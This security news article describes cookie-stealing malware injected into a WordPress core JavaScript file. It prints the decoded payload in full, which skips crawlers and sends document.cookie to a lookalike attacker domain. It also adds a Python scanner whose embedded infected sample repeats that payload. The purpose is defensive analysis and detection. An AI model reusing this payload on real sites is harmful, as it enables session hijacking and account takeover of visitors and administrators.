Malware Steals WordPress Cookies and Sends Them to a Fake WordPress API

Sucuri researchers warned that the “code.wordprssapi.com” website was recently used to steal WordPress cookies and hijack sessions. An attacker who steals an active session cookie can impersonate that user and perform any action the user has permission to perform.

A cookie is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added to the shopping cart in an online store) or to record the user’s browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past).

The attackers chose a domain name that does not look suspicious and resembles a legitimate WordPress domain (wordprssapi.com). This is especially dangerous when the stolen cookies belong to administrator users.

The hackers injected malicious code into a WordPress core file (wp-includes/js/hoverIntent.min.js), appending it to the bottom of the JavaScript file wrapped in the typical eval(function(p,a,c,k,e,d){...}) packer obfuscation.

Sucuri researchers decoded the code and found the following:

function adsadsgg() {
  // Marker cookie: once it is set, this browser is skipped for the next 24 hours.
  var gd = document.cookie.indexOf("_utmzz=");
  // Skip visits whose user agent looks like a search engine crawler.
  if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
    // Only exfiltrate on roughly half of the eligible visits.
    var rd = Math.floor(Math.random() * 2);
    if (rd == 0) {
      // Leak document.cookie as a query parameter of an injected <script> request.
      var sss = document.createElement('script');
      sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
      document.body.appendChild(sss);
    }
    // Set the marker cookie for 24 hours so the check is not repeated.
    var dd = new Date();
    dd.setTime(dd.getTime() + 86400000);
    window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString();
  }
}
// Run once jQuery is ready if it is present, otherwise on window load.
if (typeof(jQuery) != 'undefined') {
  jQuery(function() {
    adsadsgg();
  });
} else {
  window.onload = function() {
    adsadsgg();
  };
}

The conditional statement at the top of the function skips visitors whose user agent matches a search engine spider, so the cookies that reach the attackers are more likely to belong to real users and to be usable immediately.
The injected code then gathers the current cookie data and sends it to the malicious website (code.wordprssapi.com), where it can be used by the attackers.

Attackers use tricks like these to evade detection by webmasters. Webmasters can avoid falling victim to such attacks by paying close attention to the code when reviewing it, and by always checking that any domain a script loads from is legitimate.
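As an added example (not code from Sucuri or from the article), the Python scanner below automates the review step above for files under wp-includes/js: it flags the three traits of this injection, an appended p,a,c,k,e,d packer, a document.cookie read, and a <script> src pointing at a host outside an allow-list. The allow-list of legitimate hosts, the abridged hoverIntent stub and the infected sample are constructed for the example.

```python
import re
import sys
from pathlib import Path

# Heuristics for the injection described in the article: a p,a,c,k,e,d packer appended
# to a core JS file, a document.cookie read, and a <script> src on an unexpected host.
PACKER_RE = re.compile(r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*[dr]\s*\)")
COOKIE_RE = re.compile(r"document\.cookie")
SRC_RE = re.compile(r"""\.src\s*=\s*["']https?://([a-z0-9.\-]+)""", re.I)
BOT_FILTER_RE = re.compile(r"Googlebot|Bingbot|Slurp|Yandex", re.I)

def refang(source):
    """Undo the hxxps:// and [.] defanging used when malware is quoted."""
    return source.replace("hxxp", "http").replace("[.]", ".")

def scan_js(source, allowed_hosts):
    """Return a list of findings for one JavaScript file ([] when clean)."""
    src = refang(source)
    findings = []
    if PACKER_RE.search(src):
        findings.append("p,a,c,k,e,d packer present")
    hosts = {h.lower() for h in SRC_RE.findall(src)}
    unknown = sorted(h for h in hosts if h not in allowed_hosts)
    for host in unknown:
        findings.append(f"script loaded from unexpected host {host}")
    if unknown and COOKIE_RE.search(src):
        findings.append("document.cookie combined with external script load (possible exfiltration)")
    if COOKIE_RE.search(src) and BOT_FILTER_RE.search(src):
        findings.append("crawler user-agent filter next to cookie access (cloaking)")
    return findings

# Constructed samples (not the real hoverIntent.min.js): an abridged clean file
# and an infected copy with the decoded payload and a packer stub appended.
CLEAN_JS = "(function($){$.fn.hoverIntent=function(h,o){/* ... */};})(jQuery);\n"
INFECTED_JS = CLEAN_JS + (
    "function adsadsgg(){if(document.cookie.indexOf('_utmzz=')==-1&&"
    "(/Googlebot|Bingbot|Slurp|Yandex/i.test(navigator.userAgent)==false)){"
    "var sss=document.createElement('script');"
    "sss.src='hxxps://code.wordprssapi[.]com/ajax/json.aspx?c='+escape(document.cookie);"
    "document.body.appendChild(sss)}}\n"
    "eval(function(p,a,c,k,e,d){return p}('adsadsgg()',0,0,[],0,{}))\n"
)
SITE_HOSTS = {"example-blog.test", "ajax.googleapis.com"}  # constructed allow-list

if __name__ == "__main__":  # python scan.py wp-includes/js/*.js, or the samples if no args
    files = [(p, Path(p).read_text(errors="replace")) for p in sys.argv[1:]]
    for name, text in files or [("CLEAN_JS", CLEAN_JS), ("INFECTED_JS", INFECTED_JS)]:
        for finding in scan_js(text, SITE_HOSTS):
            print(f"{name}: {finding}")
```

Run over a real install, the allow-list should hold only the hosts the site is known to load scripts from, and any hit on a core file is a cue to compare that file against a fresh copy of the same WordPress release.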
